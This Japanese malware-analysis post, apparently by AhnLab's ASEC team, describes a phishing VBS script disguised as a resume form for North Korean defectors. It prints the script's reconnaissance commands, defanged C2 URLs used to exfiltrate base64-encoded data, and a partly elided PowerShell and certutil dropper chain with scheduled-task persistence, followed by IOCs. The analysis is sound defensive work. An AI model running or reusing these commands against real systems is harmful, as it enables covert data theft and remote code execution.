脱北者の履歴書フォームを装った APT 攻撃 (VBS スクリプト)

ASEC 分析チームは最近、対北朝鮮関連の内容のフィッシングメールを通じて、情報流出を目的とした不正な VBS が拡散していることを確認した。対北朝鮮関連の放送出演オファーの内容が記載されており、圧縮ファイルが添付されている。履歴書の作成について言及しており、添付されたファイルの実行を誘導している。圧縮ファイルの中には不正な VBS スクリプトファイルが存在する。

図1.拡散しているメール
図2.添付された圧縮ファイル

「2022 履歴書フォーム.vbs」ファイルの簡略化した振る舞いは以下の通りである。

  • 情報収集および転送
  • 正常なアレアハングルファイルの生成
  • 追加の不正なスクリプトファイルの生成およびタスクスケジューラの登録

VBS ファイルを実行すると、以下のコマンドによってユーザー PC の情報を収集する。

収集情報コマンド
現在実行中のプロセスリストcmd /c tasklist /v | clip
ルーティングテーブル情報cmd /c Route print | clip
Program Files フォルダー情報cmd /c dir /w “”%SystemRoot%/../Program Files”” | clip
Program Files (x86) フォルダー情報cmd /c dir /w “”%SystemRoot%/../Program Files (x86)”” | clip
表1.収集情報

その後、収集した情報を Base64 でエンコードしたあと hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php へ転送する。

  • パラメータ値 : Cache=error&Sand=[User 名]&Data=[base64 でエンコードした収集情報]&Em=[base64 でエンコードしたユーザー名]

また、正常なファイルを装うために「2022 履歴書フォーム.vbs」ファイルを実行したフォルダーに「2022.hwp」コマンドで生成されたアレアハングル形式のファイルを実行する。アレアハングル形式のファイルは、以下のように履歴書フォームの形を取っている。

図3.アレアハングル形式ファイルの中身
図4.アレアハングル形式ファイルのプロパティ

その後、情報を転送した URL から受信したレスポンスに存在するデータを PowerShell を利用して実行する。また、このレスポンスによって生成された %appdata%\mscornet.vbs ファイルを Google Update Source Link という名前でタスクスケジューラに登録する。これに加えて、スタートアッププログラムフォルダーに mscornet.vbs をコピーして VBS ファイルが自動で実行されるようにしたあと「2022 履歴書フォーム.vbs」ファイルを自己削除する。

図5.生成されたタスクスケジューラ

現在は情報を転送した hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php からこれといったレスポンスは受信されないが、当社の自動解析システム RAPIT に記録されている受信レスポンス(3/26確認)には、追加のコマンドが存在する。

このレスポンスメッセージは PowerShell を利用して base64 でエンコードされたデータを %AppData%\~KB3241.tmp に保存する。その後 ~KB3241.tmp をデコードして %AppData%\mscornet.vbs に保存したあと ~KB3241.tmp を削除する。

powershell -w hidden ECHO OFF echo RnVuY3Rpb24gaDJzKGgpDQogIERpbSBhIDogYSA9IFNwbGl0KGgpDQogIERpbSBp > "%AppData%\~KB3241.tmp" 
echo DQogIEZvciBpID0gMCBUbyBVQm91bmQoYSkNCiAgICAgIGEoaSkgPSBDaHIoIiYi >> "%AppData%\~KB3241.tmp" 
<省略>
echo ZSINCmtpbGxQcm9jZXNzICJpZWxvd3V0aWwuZXhlIg== >> "%AppData%\~KB3241.tmp" 
certutil -f -decode "%AppData%\~KB3241.tmp" "%AppData%\mscornet.vbs" 
del "%AppData%\~KB3241.tmp"

mscornet.vbs は hxxp://cmaildowninvoice.webcindario[.]com/contri/sqlite/msgbugGlog.php?Cache=fail&Sand=[PC名] に接続して受け取ったレスポンスを Execute コマンドによって実行する。現在、この URL から追加のコマンドは確認できないが、攻撃者により様々な不正な振る舞いを実行することができる。

最近、対北朝鮮関連の内容を装ったマルウェアが Word ドキュメント形式だけでなく VBS スクリプト形式でも出回っており、ユーザーの注意が要求される。

現在 AhnLab V3 製品は、当該ファイルに対して以下の通り検知している。

[ファイル検知]
Dropper/VBS.Generic
Trojan/VBS.Agent

[IOC]
ab97956fec732676ecfcedf55efadcbc
e49e41a810730f4bf3d43178e4c84ee5
hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php
hxxp://cmaildowninvoice.webcindario[.]com/contri/sqlite/ msgbugGlog.php

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories:マルウェアの情報

Tagged as:

0 0 votes
評価する
guest
0 コメント
Inline Feedbacks
View all comments